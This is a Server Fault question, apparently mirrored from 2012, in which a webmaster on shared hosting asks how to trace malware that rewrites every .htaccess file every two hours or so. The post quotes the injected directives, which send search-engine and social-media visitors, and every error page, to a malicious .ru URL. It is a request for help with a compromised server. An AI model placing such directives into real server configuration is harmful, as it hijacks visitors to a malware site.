shared hosting with malware, .htaccess file gets modified every 2 hours or so
Posted
by
apache
on Server Fault
See other posts from Server Fault
or by apache
Published on 2012-06-07T22:36:31Z
Indexed on
2012/06/07
22:42 UTC
Read the original article
Hit count: 260
apache2
I spent all day today chasing malware on the shared hosting for one of my clients.
The issue is as follows: Every 2 hours or so .htaccess file and all other .htaccess files gets modified, on the top of the file these lines are added:
IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L]
</IfModule>
and on the bottom:
ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8
ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8
The main problem I'm not root on the server, and cannot sudo, as this is shared hosting with 100's of websites. Typical good commands like dmesg, lsof, dtrace, chattr and many others are not available to me as I'm not root.
I can't find who is modifying .htaccess files, how do I get that info? My guess is some php script is changing that which is called from outside via command and control.
This seems to relate to this: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/
How do I find out who is modifying .htaccess files without being root?
© Server Fault or respective owner